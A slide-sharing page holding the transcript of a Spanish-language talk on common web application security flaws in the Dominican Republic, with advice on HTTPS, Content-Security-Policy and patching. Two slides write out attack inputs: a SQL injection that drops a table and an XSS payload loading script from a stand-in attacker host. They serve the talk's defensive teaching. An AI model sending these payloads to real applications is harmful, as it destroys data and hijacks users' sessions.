Upgrade to PRO for Only $50/Year—Limited-Time Offer! 🔥

There Is No Silver Bullet (Español)

Avatar for Harley Watson Harley Watson
November 29, 2014
Programming
0
170

There Is No Silver Bullet (Español)

Avatar for Harley Watson

Harley Watson

November 29, 2014
Tweet

More Decks by Harley Watson

See All by Harley Watson
paper tickets > smartcards, probably.
Avatar for Harley Watson unlobito
0
7.7k
one, two step
Avatar for Harley Watson unlobito
0
820
What's in your pocket? (BSides Manchester)
Avatar for Harley Watson unlobito
0
1k
sorry, we're cash only. (securi-tay)
Avatar for Harley Watson unlobito
1
1.2k
Sorry, we're cash only. (hacksoc)
Avatar for Harley Watson unlobito
0
110
There Is No Silver Bullet
Avatar for Harley Watson unlobito
0
960

Other Decks in Programming

See All in Programming
俺流レスポンシブコーディング 2025
Avatar for TAK tak_dcxi
14
8.6k
認証・認可の基本を学ぼう前編
Avatar for kaza kouyuume
0
200
DevFest Android in Korea 2025 - 개발자 커뮤니티를 통해 얻는 가치
Avatar for Suhyeon Kim wisemuji
0
130
これだけで丸わかり!LangChain v1.0 アップデートまとめ
Avatar for os1ma os1ma
6
1.8k
生成AIを利用するだけでなく、投資できる組織へ
Avatar for pospome pospome
1
310
手が足りない!兼業データエンジニアに必要だったアーキテクチャと立ち回り
Avatar for zinkosuke zinkosuke
0
630
從冷知識到漏洞,你不懂的 Web,駭客懂 - Huli @ WebConf Taiwan 2025
Avatar for Huli aszx87410
2
2.3k
令和最新版Android Studioで化石デバイス向けアプリを作る
Avatar for Sora Arakawa arkw
0
390
20 years of Symfony, what's next?

Avatar for Fabien Potencier fabpot
2
350
【CA.ai #3】ワークフローから見直すAIエージェント — 必要な場面と“選ばない”判断
Avatar for SatoAoaka satoaoaka
0
240
ゲームの物理 剛体編
Avatar for Fadis fadis
0
330
251126 TestState APIってなんだっけ?Step Functionsテストどう変わる?
Avatar for Takumi Abe east_takumi
0
310

Featured

See All Featured
CSS Pre-Processors: Stylus, Less & Sass
Avatar for Bermon Painter bermonpainter
359
30k
Let's Do A Bunch of Simple Stuff to Make Websites Faster
Avatar for Chris Coyier chriscoyier
508
140k
Building Applications with DynamoDB
Avatar for Matt Wood mza
96
6.8k
Building Better People: How to give real-time feedback that sticks.
Avatar for Will Jessup wjessup
370
20k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
Avatar for Aki / @LoveIdahoBurger aki_iinuma
128
54k
jQuery: Nuts, Bolts and Bling
Avatar for Doug Neiner dougneiner
65
8.2k
Rebuilding a faster, lazier Slack
Avatar for samanthasiow samanthasiow
84
9.3k
[RailsConf 2023 Opening Keynote] The Magic of Rails
Avatar for Eileen M. Uchitelle eileencodes
31
9.8k
A Modern Web Designer's Workflow
Avatar for Chris Coyier chriscoyier
698
190k
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
Avatar for Irina Nazarova irinanazarova
9
1.1k
The Illustrated Children's Guide to Kubernetes
Avatar for Chris Short chrisshort
51
51k
Producing Creativity
Avatar for Steve Smith orderedlist
PRO
348
40k

Transcript

  1. there is no silver bullet Henri Watson

  2. ¿Cuáles  son  los  problemas  que   comúnmente  afectan  a  las

     aplicaciones   web  en  la  República  Dominicana?  

  3. Una  falta  de  HTTPS  

  4. Usar  HTTPS  no  te  va  a  quitar  el   pica

     pollo  del  día.  

  5. La  propuesta  actual  para    HTTP/2.0  obliga  el  uso  de

     TLS.    

  6. Si  decides  usar  HTTPS,  también  usa   Strict-­‐Transport-­‐Security   y

     ssllabs.com/ssltest  

  7. Inyecciones  SQL  

  8. GET  /rastreador?orden=12345”;   DROP  TABLE  ordenes;-­‐-­‐   SELECT  *  FROM

     ordenes  WHERE  orden  =  “12345”;   DROP  TABLE  ordenes;-­‐-­‐”  AND  estado  =  “pendiente”   Solicitud  del   cliente  al  servidor.   Solicitud  del  servidor  web    a  la  base  de  datos.  
  9. None
  10. None
  11. None

  12. Problemas  en  el  manejo  de   autenacación  

  13. None
  14. None

  15. Cross-­‐Site  Scripang  (XSS)  

  16. GET  /hola?nombre=<script  src=“hhp://malva.do/ jajaxddd.js”></script>   ¡Hola,  <script  src=“hhp://malva.do/jajaxddd.js”></ script>!  

    Solicitud  del   cliente  al  servidor.   Respuesta  del   servidor  al  cliente.  

  17. Content-­‐Security-­‐Policy  

  18. Exposición  de  datos  sensiavos  

  19. None

  20. Ualizando  Componentes  con   Vulnerabilidades  Conocidas  

  21. Mailing  Lists   •  bugtraq   hhp://www.securityfocus.com/archive/1   •  debian-­‐security-­‐announce

      hhps://lists.debian.org/debian-­‐security-­‐announce/   •  fulldisclosure   hhp://nmap.org/mailman/lisanfo/fulldisclosure  

  22. Mailing  Lists   •  [email protected]   hhps://hhpd.apache.org/lists.html#hhp-­‐announce   •  nginx-­‐announce

      hhp://mailman.nginx.org/mailman/lisanfo/nginx-­‐ announce   •  php-­‐announce   hhp://php.net/mailing-­‐lists.php  
  23. None

  24. Servicio  a  Cliente  

  25. None

  26. ¿Por  qué  una  no  existe  una   «  bala  de

     plata  »?  

  27. La  seguridad  informáaca  es  una   inversión  constante.  

  28. Heartbleed  

  29. Al  poner  los  datos  de  tus   usuarios  en  riesgo,

     también  pones   tu  reputación  en  riesgo.  

  30. ¡Gracias!   @henriwatson   [email protected]     hhps://henriwatson.com/talks/silverbullet